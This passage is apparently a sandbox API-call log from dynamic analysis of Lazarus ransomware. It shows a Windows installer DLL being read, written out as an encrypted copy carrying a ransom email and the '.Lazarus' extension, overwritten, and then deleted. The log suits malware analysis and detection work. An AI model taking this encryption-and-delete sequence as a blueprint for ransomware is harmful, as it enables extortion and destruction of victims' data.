lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.123] AreFileApisANSI () returned 1 [0070.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0070.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0070.123] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.124] GetFileType (hFile=0x418) returned 0x1 [0070.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0070.124] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0070.124] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0070.124] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0070.124] CloseHandle (hObject=0x418) returned 1 [0070.125] AreFileApisANSI () returned 1 [0070.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0070.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0070.125] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.125] GetFileType (hFile=0x418) returned 0x1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.125] CloseHandle (hObject=0x418) returned 1 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0070.126] AreFileApisANSI () returned 1 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0070.126] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0070.126] AreFileApisANSI () returned 1 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0070.126] GetLastError () returned 0x0 [0070.126] SetLastError (dwErrCode=0x0) [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3b0 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0070.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0070.127] GetLastError () returned 0x0 [0070.127] SetLastError (dwErrCode=0x0) [0070.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0070.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0070.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0070.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0070.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0070.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0070.127] AreFileApisANSI () returned 1 [0070.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0070.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0070.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0070.127] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.127] GetFileType (hFile=0x418) returned 0x1 [0070.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0070.128] AreFileApisANSI () returned 1 [0070.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0070.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0070.128] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.128] GetFileType (hFile=0x428) returned 0x1 [0070.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.128] GetLastError () returned 0x0 [0070.128] SetLastError (dwErrCode=0x0) [0070.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.128] GetLastError () returned 0x0 [0070.128] SetLastError (dwErrCode=0x0) [0070.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0070.129] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0070.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0070.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0070.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0070.130] GetLastError () returned 0x0 [0070.130] SetLastError (dwErrCode=0x0) [0070.131] GetLastError () returned 0x0 [0070.131] SetLastError (dwErrCode=0x0) [0070.131] GetLastError () returned 0x0 [0070.131] SetLastError (dwErrCode=0x0) [0070.131] GetLastError () returned 0x0 [0070.131] SetLastError (dwErrCode=0x0) [0070.131] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.131] WriteFile (in: hFile=0x418, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.132] GetLastError () returned 0x0 [0070.132] SetLastError (dwErrCode=0x0) [0070.132] GetLastError () returned 0x0 [0070.132] SetLastError (dwErrCode=0x0) [0070.133] GetLastError () returned 0x0 [0070.133] SetLastError (dwErrCode=0x0) [0070.133] GetLastError () returned 0x0 [0070.133] SetLastError (dwErrCode=0x0) [0070.133] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.133] WriteFile (in: hFile=0x418, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.133] GetLastError () returned 0x0 [0070.133] SetLastError (dwErrCode=0x0) [0070.133] GetLastError () returned 0x0 [0070.133] SetLastError (dwErrCode=0x0) [0070.133] GetLastError () returned 0x0 [0070.133] SetLastError (dwErrCode=0x0) [0070.134] GetLastError () returned 0x0 [0070.134] SetLastError (dwErrCode=0x0) [0070.134] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0070.134] WriteFile (in: hFile=0x418, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.134] GetLastError () returned 0x0 [0070.134] SetLastError (dwErrCode=0x0) [0070.134] GetLastError () returned 0x0 [0070.134] SetLastError (dwErrCode=0x0) [0070.134] GetLastError () returned 0x0 [0070.134] SetLastError (dwErrCode=0x0) [0070.134] GetLastError () returned 0x0 [0070.134] SetLastError (dwErrCode=0x0) [0070.135] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0070.135] WriteFile (in: hFile=0x418, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0070.135] GetLastError () returned 0x0 [0070.135] SetLastError (dwErrCode=0x0) [0070.135] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0070.135] GetLastError () returned 0x0 [0070.135] SetLastError (dwErrCode=0x0) [0070.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0070.135] GetLastError () returned 0x0 [0070.135] SetLastError (dwErrCode=0x0) [0070.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0070.135] WriteFile (in: hFile=0x418, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0070.136] GetLastError () returned 0x0 [0070.136] SetLastError (dwErrCode=0x0) [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.136] GetLastError () returned 0x0 [0070.136] SetLastError (dwErrCode=0x0) [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0070.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0070.136] CloseHandle (hObject=0x418) returned 1 [0070.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.137] CloseHandle (hObject=0x428) returned 1 [0070.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.137] AreFileApisANSI () returned 1 [0070.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0070.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0070.138] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0070.139] GetFileType (hFile=0x428) returned 0x1 [0070.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0070.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0070.139] GetLastError () returned 0xb7 [0070.139] SetLastError (dwErrCode=0xb7) [0070.139] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0070.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0070.375] CloseHandle (hObject=0x428) returned 1 [0070.376] AreFileApisANSI () returned 1 [0070.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0070.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0070.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0070.376] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll")) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.377] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.378] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="IJ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧芐\x07̧비聐蚀\x08賂̧")) returned 0 [0070.378] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0070.378] RtlAllocateHeap (HeapHandle=0x20000, 